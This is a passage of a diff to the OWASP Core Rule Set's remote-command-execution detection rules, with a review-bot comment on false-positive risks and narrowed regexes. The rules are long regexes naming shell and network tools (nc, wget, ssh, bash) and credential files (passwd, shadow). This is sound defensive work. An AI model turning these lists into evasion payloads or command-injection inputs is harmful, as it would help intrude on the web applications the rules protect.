[\s\x0b&\),<>\|]|int(?:env|f[\s\x0b&\),<>\|]))|t(?:x[\s\x0b&\),<>\|]|ar(?:[\s\x0b&\),<>\|]|diff|grep))|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|s(?:(?:ed|ql)[\s\x0b&\),<>\|]|ftp)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:a(?:r|k[eu])|cp?|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:(?:d(?:carpet)?|v|boot|name|p(?:eat|lace))[\s\x0b&\),<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\),<>\|]|t(?:[\s\x0b&\),<>\|]|-(?:dump|tar))|user)|pm(?:(?:db)?[\s\x0b&\),<>\|]|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|(?:ft|na)p|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:d|ndmail|rvice)[
\s\x0b&\),<>\|]|t(?:(?:facl)?[\s\x0b&\),<>\|]|arch|cap|env|sid))|h(?:(?:u(?:f|tdown))?[\s\x0b&\),<>\|]|\.distrib)|s(?:[\s\x0b&\),<>\|]|h(?:[\s\x0b&\),<>\|]|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|do(?:-rs|[\s\x0b&\),<>_\|]|edit|replay))|vn(?:[\s\x0b&\),<>\|]|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)[\s\x0b&\),<>\|]|elim)|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:(?:[cr]|ilf?)[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|(?:bl|o(?:p|uch)|ftp|mux)[\s\x0b&\),<>\|]|e(?:[ex][\s\x0b&\),<>\|]|lnet)|i(?:c[\s\x0b&\),<>\|]|me(?:datectl|out[\s\x0b&\),<>\|]))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:l(?:imit)?[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|diff)|(?:[ep]w|gr|rsh)[\s\x0b&\),<>\|]|sudo(?:-rs)?)|algrind|olatility[\s\x0b&\),<>\|])|w(?:(?:3m|c|a(?:ll|tch)|get)[\s\x0b&\),<>\|]|h(?:iptail[\s\x0b&\),<>\|]|o(?:ami|is[\s\x0b&\),<>\|]))|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:(?:x|pa)d|args|term)[\s\x0b&\),<>\|]|z(?:(?:c(?:at|mp))?[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more)|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|]))|z(?:ip(?:[\s\x0b&\),<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h[\s\x0b&\),<>\|]|oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|mo(?:dload|re[\s\x0b&\),<>\|])|ypper))" \ "id:932236,\ phase:2,\ block,\ 
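Review bot: The regenerated 932236 expression adds several short, common English words to the PL2 command list — `(?:GE|POS)T`, `HEAD`, `y(?:e(?:s|lp)|um|arn)`, `a(?:sh|te)` (date), `i(?:(?:d|rb|conv|nstall)` (id, install), `i(?:(?:alo)?g|r|ff)` (dir) — and since the prefix alternation accepts `^` and `=` and the whole pattern is `(?i)`, an ordinary argument value such as `date today` or `id 42` now scores CRITICAL at PL2 as soon as a separator follows the word; the additions look intentional (presumably new entries in the assembly source, which is not part of this hunk), but there is no accompanying negative test, so a false-positive regression test for these words would make the change verifiable. The new side also drops every `|$` alternative after a command word (old `(?:[\s\x0b&\),<>\|]|$)` becomes `[\s\x0b&\),<>\|]`), which matches the new comment-block note that 932340/932350 now cover commands without arguments; a one-line mention in the 932236 header comment (`# Commands with no arguments are handled by 932340/932350`) would keep that narrowing from being read as a regression. The assignment prefix `[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|...)` carries two identical branches in `\$(?:.*|.*)` on both the old and the new side; it is harmless, but the cleanup belongs in the regex-assembly source, not in this generated line. The rule's action list (`"id:932236,\ phase:2,\ block,\`) continues past the end of the hunk.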
@@ -1601,7 +1677,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1621,6 +1697,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
@@ -1647,7 +1725,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932239 # -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&
)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|p(?:t(?:[\s\x0b&\),<>\|]|$|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&
\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|io(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:t(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|ontab))|d(?:(?:[dfu]|i(?:(?:alo)?g|ff)|ash|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:b|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|letest|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:m(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\)
,<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|(?:rb|conv)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|(?:c(?:at|mp))?(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|il[qx]|ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te
(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p(?:[^\s\x0b]{1,10}\b|[\s\x0b&\),<>\|]|$)|dstat|(?:gz|ng6?)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|grep|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|place)(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|t(?:[\s\x0b&\),<>\|]|$|-(?:dump|tar))|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:c(?:p|hed|ript)|g|ash|diff|ftp|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|sh(?:[\s\x0b&\),<>\|]|$|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|u(?:[\s\x0b&\),<>\|]|$|do(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:cat(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem
(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|skset)|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|medatectl)|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|$|diff)|(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:c|atch)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|oami)|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|y(?:um|arn|elp)(?:[\s\x0b&\),<>\|]|$)|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|ypper))" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx 
(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9